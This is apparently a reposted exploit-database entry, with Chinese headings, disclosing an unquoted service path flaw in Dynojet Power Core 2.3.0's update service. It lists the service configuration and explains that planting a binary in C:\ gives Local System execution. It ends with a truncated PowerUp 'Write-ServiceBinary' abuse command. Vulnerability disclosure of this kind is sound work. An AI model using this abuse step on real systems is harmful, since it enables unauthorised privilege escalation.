关键漏洞信息 EDB-ID: 50466 CVE: N/A Author: Pedro Sousa Rodrigues Type: LOCAL Platform: WINDOWS Date: 2021-11-02 Vulnerable App: Dynojet Power Core 2.3.0 漏洞详情 Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path Version: 2.3.0 (Build 303) Vendor Homepage: https://www.dynojet.com Software Link: https://docs.dynojet.com/Document/18762 Tested on: Windows 10 Version 21H1 (OS Build 19043.1320) 漏洞服务信息 SERVICE_NAME: DJ.UpdateService - TYPE: 10 WIN32_OWN_PROCESS - START_TYPE: 3 DEMAND_START - ERROR_CONTROL: 1 NORMAL - BINARY_PATH_NAME: C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe 漏洞利用说明 Exploit: 通过在系统根路径中插入代码,任何身份验证用户可以手动执行服务。如果成功,本地用户的代码将以本地系统权限执行。 CanRestart: True Name: DJ.UpdateService Path: C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe ModifiablePath: @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]} AbuseFunction: Write-ServiceBinary -Name 'DJ.UpdateService' -Path